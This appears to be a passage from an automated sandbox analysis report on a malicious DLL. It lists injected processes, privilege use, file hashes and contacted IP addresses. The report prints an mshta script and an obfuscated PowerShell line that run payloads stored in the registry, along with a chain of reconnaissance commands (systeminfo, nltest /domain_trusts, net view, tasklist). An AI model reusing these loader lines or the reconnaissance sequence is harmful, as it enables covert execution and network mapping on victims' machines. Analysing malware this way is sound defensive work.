Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 844 wrote to memory of 1816 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 844 wrote to memory of 1816 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 844 wrote to memory of 1816 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4424 wrote to memory of 3932 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3932 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3932 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 516 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 516 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3932 wrote to memory of 696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3932 wrote to memory of 696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 696 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 696 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 1860 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1860 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1860 wrote to memory of 3656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1860 wrote to memory of 3656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1860 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1860 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 5028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 5028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2876 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2876 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2876 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3020 wrote to memory of 3936 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 3936 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4668 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4668 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4668 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4668 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3020 wrote to memory of 4240 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4240 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4452 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 4452 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4452 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 4452 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3020 wrote to memory of 4448 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
RO 37.120.206.71:80 37.120.206.71 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
IE 13.69.239.72:443 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/1816-130-0x0000000000000000-mapping.dmp

memory/1816-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1816-136-0x0000000000CD0000-0x0000000000CDD000-memory.dmp

memory/3932-140-0x0000000000000000-mapping.dmp

memory/3932-141-0x000001CF6D940000-0x000001CF6D962000-memory.dmp

memory/3932-142-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp

memory/516-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline

MD5 f2734214002408a7eccd2fbae5870da5
SHA1 fde6d5c4e61dff27f46f69c480155e1101397700
SHA256 552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102
SHA512 3e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5

\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/2720-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP

MD5 e250c595c30addb02ffc6984e63a7380
SHA1 b44e41b7d62b61f9b04eed3e311910f34a0ebedb
SHA256 15f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063
SHA512 8abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6

C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp

MD5 a9eead4a76288738990c8668032dd780
SHA1 ece0771b0b40abec808cd5e8dedfbebbd4345d68
SHA256 925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc
SHA512 b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb

C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll

MD5 8495c9cbe1593820014899a043577e1b
SHA1 b395a19a3262dc61ea9f3174cad05e194fcbbe57
SHA256 08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8
SHA512 035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715

memory/696-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline

MD5 340f65806e42a1b022861685812d236b
SHA1 a53ffde123a1837fe255d764e7a992ab905fb8b9
SHA256 b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7
SHA512 30b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb

\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/1932-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP

MD5 83ab673e353bc97b876da6cfc8b171d8
SHA1 4a661313af68b943f2580cdbcf76b19a89e12734
SHA256 2a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e
SHA512 a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93

C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp

MD5 860be3be01f3f3c1bb8223c4b4ebf8d5
SHA1 98662fcdbf155d942f6aec76e367f0fef5cb1f21
SHA256 51f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54
SHA512 63f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b

C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.dll

MD5 ea0f2464b104a78625ed3074b10d5b26
SHA1 871ebae4ea06340b952d4671f6cf79013808bf22
SHA256 4823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506
SHA512 82fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10

memory/3932-157-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp

memory/3932-158-0x000001CF6F4E0000-0x000001CF6F51D000-memory.dmp

memory/3448-159-0x000001E7C59B0000-0x000001E7C5A53000-memory.dmp

memory/3020-160-0x0000000007E40000-0x0000000007EE3000-memory.dmp

memory/2616-162-0x0000000000000000-mapping.dmp

memory/1860-161-0x0000000000000000-mapping.dmp

memory/3656-163-0x0000000000000000-mapping.dmp

memory/1344-164-0x0000000000000000-mapping.dmp

